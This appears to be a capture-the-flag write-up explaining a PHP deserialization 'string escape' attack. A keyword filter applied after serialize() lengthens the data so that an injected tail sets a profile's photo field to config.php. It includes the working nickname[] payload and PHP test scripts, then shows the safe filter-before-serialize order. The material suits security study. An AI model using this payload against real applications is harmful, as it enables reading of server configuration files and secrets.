Steps:
nickname[]=wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}
The existing write-ups for this challenge are already very detailed, so I will only note one point: why does nickname have to be passed as that long string?
<?php
// The challenge's filter(): quotes and backslashes become "_", and SQL keywords
// become "hacker". Note that "where" is 5 bytes while "hacker" is 6.
function filter($string)
{
    $escape = array('\'', '\\\\');
    $escape = '/' . implode('|', $escape) . '/';
    $string = preg_replace($escape, '_', $string);
    $safe = array('select', 'insert', 'update', 'delete', 'where');
    $safe = '/' . implode('|', $safe) . '/i';
    return preg_replace($safe, 'hacker', $string);
}
// Experiment 1: nickname passed as an array, with the string length already declared
// as 204 although only 170 bytes of "where" follow; compare before and after filter().
$s = 'a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:8:"ss@q.com";s:8:"nickname";a:1:{i:0;s:204:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere"};s:5:"photo";s:10:"config.php";}s:39:"upload/804f743824c0451b2f60d81b63b6a900";}';
var_dump(filter($s));
var_dump(unserialize($s));
var_dump('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&');
$a = filter($s);
var_dump($a);
var_dump(unserialize($a));
var_dump('**************************************************');
// Experiment 2: the structure the injected tail produces. The original profile was:
// $profile = 'a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:8:"ss@q.com";s:8:"nickname";s:8:"sea_sand";s:5:"photo";s:10:"config.php";}s:39:"upload/804f743824c0451b2f60d81b63b6a900";}';
// With the tail inside the structure, "photo" becomes config.php and the real upload
// path is left after the closing brace, where unserialize() ignores it.
$profile = 'a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:8:"ss@q.com";s:8:"nickname";s:170:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";s:5:"photo";s:10:"config.php";}s:39:"upload/804f743824c0451b2f60d81b63b6a900";}';
var_dump($profile);
var_dump(unserialize($profile));
The run of `where` is 170 bytes long; after it is turned into `hacker` it is 204 bytes, a difference of exactly 34. So we declare a length of 204 up front and fill it with the `where` run followed by our 34-byte tail (at this point the serialized data is not valid, because only 170 bytes of `where` sit inside the declared 204), and let filter() replace `where` with `hacker` so that the `hacker` run alone fills the 204 bytes (now the serialized data is valid). The 34 bytes of serialized data that follow are what we want to pass as photo, and they push the original photo entry out of the structure.
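As an added example (not the challenge's code or the author's test script), the same filter() run in both orders: after serialize(), where the 34 extra bytes let the tail take over, and per field before serialize(), where every s:N is computed from the already-filtered value. The profile array and the filter_deep() helper are constructed for this example; the filter() body is the one quoted above.

```php
<?php
// filter() as quoted in the write-up: quotes/backslashes -> "_", SQL keywords -> "hacker".
function filter($string)
{
    $escape = array('\'', '\\\\');
    $escape = '/' . implode('|', $escape) . '/';
    $string = preg_replace($escape, '_', $string);
    $safe = array('select', 'insert', 'update', 'delete', 'where');
    $safe = '/' . implode('|', $safe) . '/i';
    return preg_replace($safe, 'hacker', $string);
}

// Helper constructed for this example: apply filter() to every field before serializing.
function filter_deep($value)
{
    return is_array($value) ? array_map('filter_deep', $value) : filter($value);
}

// Constructed input mirroring the write-up: 34 copies of "where" (170 bytes) followed by
// the 34-byte tail that closes the string and injects a new "photo" entry.
$tail     = '";}s:5:"photo";s:10:"config.php";}';
$nickname = array(str_repeat('where', 34) . $tail);   // 204 bytes, passed as nickname[]
$profile  = array(
    'phone'    => '12345678901',
    'email'    => 'ss@q.com',
    'nickname' => $nickname,
    'photo'    => 'upload/804f743824c0451b2f60d81b63b6a900',
);

// Vulnerable order: serialize first, then filter. "where" -> "hacker" adds 34 bytes, so
// the declared s:204 now ends exactly where the tail begins and unserialize() reads the
// injected "photo" while the real upload path is left as ignored trailing data.
$vuln = unserialize(filter(serialize($profile)));
var_dump($vuln['photo']);

// Safe order: filter each field first, so the nickname is serialized with its true
// length (238 bytes) and the tail stays inside the string. "photo" keeps the upload path.
$fixed = unserialize(serialize(filter_deep($profile)));
var_dump($fixed['photo']);
```

The general lesson is that any transformation that can change a string's length must run before serialize(), never on the serialized blob, because every s:N length prefix is trusted by unserialize().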